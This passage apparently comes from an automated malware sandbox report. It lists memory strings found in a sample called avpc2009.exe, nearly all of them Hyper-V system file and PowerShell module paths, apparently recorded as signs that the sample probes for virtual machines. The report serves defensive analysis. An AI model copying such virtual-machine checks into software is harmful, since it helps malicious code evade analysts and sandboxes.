          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.17134.1_none_dacb8dcdbfa5382f
          Source: avpc2009.exe, 00000019.00000003.691717156.0000000003AE5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\wow64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.17134.1_none_c77057abb7bb80d3
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vhd-parser_31bf3856ad364e35_10.0.17134.1_none_6447f639abdaab84
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmsp_31bf3856ad364e35_10.0.17134.1_none_1ac175bdc8f2a7d7
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..-client.snapinabout_31bf3856ad364e35_10.0.17134.1_none_7338804b0eb50c17
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.17134.1_none_b7de7159233ab5033d8bbwe\\
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-winhvr_31bf3856ad364e35_10.0.17134.1_none_2becad3b77bb3580
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..nents-rdv.resources_31bf3856ad364e35_10.0.17134.1_en-us_e3616de0d25a48c4=
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.17134.1_en-us_592a4468e416a24d54cb44\*
          Source: rundll32.exe, 0000000F.00000002.554445419.000000000343C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.567500892.000000000348E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.582788633.0000000005012000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: avpc2009.exe, 00000019.00000003.697105730.0000000005B88000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.689950909.0000000005B79000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.639678148.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698345572.0000000005B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Hyper-V*
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-3dvideo_31bf3856ad364e35_10.0.17134.1_none_bb0455987cc9b004ebwe\*
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647199056.0000000005C30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0nu
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..rvcluster.resources_31bf3856ad364e35_10.0.17134.1_en-us_a86f4344ed926804Z
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..failoverreplication_31bf3856ad364e35_10.0.17134.1_none_80458ecfde93ef21
          Source: avpc2009.exe, 00000019.00000003.691717156.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.638559464.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.648908567.0000000003AE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0l
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-tpm_31bf3856ad364e35_10.0.17134.1_none_604b83348a0c5e92
          Source: avpc2009.exe, 00000019.00000003.687092295.0000000005CE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Hyper-V"
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_3c5b1e1b1b3e66b3
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.17134.1_none_602fae5e8a21fe6a
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmsp.resources_31bf3856ad364e35_10.0.17134.1_en-us_96681ed56ec765c61ba6\*9\*lj#
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.17134.1_none_c35bb6c84d5e4ad0
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-3dvideo_31bf3856ad364e35_10.0.17134.1_none_bb0455987cc9b004+
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..rvcluster.resources_31bf3856ad364e35_10.0.17134.1_en-us_a86f4344ed926804
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..edstorage.resources_31bf3856ad364e35_10.0.17134.1_en-us_bdfc93ec7698eb64w_
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.613926136.0000000005B93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetSecurity\en\Hyper-V\1.1
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.17134.1_en-us_592a4468e416a24dJ
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vhd-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_0b749ee450213385C^
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmsp.resources_31bf3856ad364e35_10.0.17134.1_en-us_96681ed56ec765c6^
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vpmem_31bf3856ad364e35_10.0.17134.1_none_c277eb1734798565
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..izationv2.resources_31bf3856ad364e35_10.0.17134.1_en-us_aea0b368e53cc261}jT
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..lebrowser.resources_31bf3856ad364e35_10.0.17134.1_en-us_73034f3cf79a1975k
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmsp.resources_31bf3856ad364e35_10.0.17134.1_en-us_96681ed56ec765c6:^,
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-ram-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_8051bd2040ebffa9
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vpcivdev_31bf3856ad364e35_10.0.17134.1_none_7873076add237d80pH
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.17134.1_none_84e0eedae46f7b9b
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.17134.1_none_8ce33edadf477e7ay
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-winhvr_31bf3856ad364e35_10.0.17134.1_none_2becad3b77bb3580,H'
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.17134.1_none_14929ba5ccea66b9QK
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.613926136.0000000005B93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: s\Hyper-V\*
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-3dvideo_31bf3856ad364e35_10.0.17134.1_none_bb0455987cc9b004PJ
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.17134.1_en-us_f8bef40208ce4908
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.17134.1_none_8ce33edadf477e7a
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-computelib_31bf3856ad364e35_10.0.17134.1_none_9321c5b124bca3df
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.17134.1_none_14929ba5ccea66b9
          Source: avpc2009.exe, 00000019.00000003.590799442.0000000003A9A000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.587503001.0000000003A94000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Hyper-Vrs
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vhd-parser_31bf3856ad364e35_10.0.17134.1_none_6447f639abdaab84M
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.17134.1_none_2457e84548829177
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-3dvideo_31bf3856ad364e35_10.0.17134.1_none_bb0455987cc9b004
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.17134.1_none_dacb8dcdbfa5382f_
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.17134.1_none_27198deddb7b50eb[
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.17134.1_none_58d19a03c592a9cb2ssociation
